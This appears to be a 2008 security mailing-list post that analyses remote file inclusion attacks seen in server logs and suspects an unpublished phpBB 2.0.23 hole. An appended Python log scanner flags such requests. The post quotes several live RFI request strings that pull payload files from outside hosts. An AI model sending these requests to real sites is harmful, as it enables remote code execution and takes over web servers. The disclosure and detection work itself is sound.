[VIM] RFI BotNet and phpBB 0-day?

security curmudgeon jericho at attrition.org
Thu Mar 20 10:04:39 UTC 2008


For a while I've noticed a ton of RFI requests made to attrition.org; the 
frequency and patterns suggest it's a large botnet possibly. I haven't had 
time to really dig into the logs and learn much about it. Tonight I saw 
one request come across and got curious how many of these requests were 
published vulnerabilities versus potential 0-day. Many requests don't have 
enough information to easily determine the software (e.g. 
/dir/index.php?id=http://), but this may:

/claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

I don't see reference to "page_tail.php" in CVE or OSVDB. The directory 
structure suggests it is either in Claroline or phpBB though.

http://www.claroline.net/download/stable.html

Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file 
above.

http://www.phpbb.com/downloads/

Version 2.0.23 ("legacy") has "page_tail.php" in it.

Version 3.0.0 (phpBB3) has no file by that name.

--

So, does anyone want to see if it is truly vulnerable? If so, we know it's 
phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we 
know it is actively being exploited in the wild and discovered as a result 
of it.

Brian



p.s. While writing this, a full example of one that would be a tad harder 
to track down, but given the "com_comprofiler" and 
"mosConfig_absolute_path", shouldn't be that difficult:
/index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f

p.p.s. And an example of an older disclosed vulnerability being used:
/squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
(CVE-2006-2483 / OSVDB 25523)
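As an added example (not code from Brian's post or from attrition.org), a small Python scanner that applies the same triage to access log lines: it flags query parameters whose value is itself a URL, pulls out the script and parameter names, and looks the pair up against the one public reference the post cites. The log lines, the log format regex and the payload hosts are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache-style access log line (constructed format assumed for this example).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the RFI tell.
URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)
# (script basename, parameter) -> public reference; only the pair the post cites.
KNOWN = {("cart_content.php", "cart_isp_root"): "CVE-2006-2483 / OSVDB 25523"}

def find_rfi(line):
    """Return details of an RFI attempt in one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    script = parts.path.rsplit("/", 1)[-1]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches %253f-style double encoding
        if not URL_VALUE.match(value):
            continue
        try:
            host = urlsplit(value).hostname
        except ValueError:      # malformed netloc in the payload URL
            host = None
        return {
            "client": m.group("client"),
            "script": script,
            "param": name,
            "payload_host": host,
            "trailing_qq": value.endswith("??"),  # the %3f%3f suffix seen in the post
            "reference": KNOWN.get((script, name), "unmapped: review against CVE/OSVDB"),
        }
    return None

def scan(lines):
    """Run find_rfi over an iterable of log lines, keeping only hits."""
    return [hit for hit in map(find_rfi, lines) if hit]

# Constructed sample lines; payload hosts are placeholders, not the post's.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Mar/2008:09:51:02 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://payload.example/id2.txt%3f%3f HTTP/1.1" 404 0',
    '203.0.113.5 - - [20/Mar/2008:09:51:03 +0000] "GET /squirrelcart/cart_content.php?cart_isp_root=http://payload.example/id2.txt%3f%3f HTTP/1.1" 404 0',
    '198.51.100.7 - - [20/Mar/2008:09:52:10 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits whose reference comes back "unmapped" are the ones worth the version-by-version file check the post walks through.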

